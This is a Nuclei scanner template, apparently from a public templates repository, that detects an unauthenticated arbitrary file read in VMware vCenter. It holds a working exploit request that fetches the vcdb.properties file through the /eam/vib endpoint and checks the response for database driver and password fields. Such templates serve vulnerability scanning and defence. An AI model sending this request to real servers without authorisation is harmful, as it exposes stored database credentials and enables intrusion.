nuclei-templates/vulnerabilities/vmware-vcenter-lfi.yaml

24 lines
656 B
YAML
Raw Normal View History

id: vmware-vcenter-lfi
info:
name: VMware vCenter Unauthenticated Arbitrary File Read
author: dwisiswant0
severity: high
description: https://twitter.com/ptswarm/status/1316016337550938122
requests:
- method: GET
path:
- "{{BaseURL}}/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers-condition: and
matchers:
- type: regex
regex:
- "(driver|dbtype|password(\\.encrypted)?)\\s="
part: body
- type: status
status:
- 200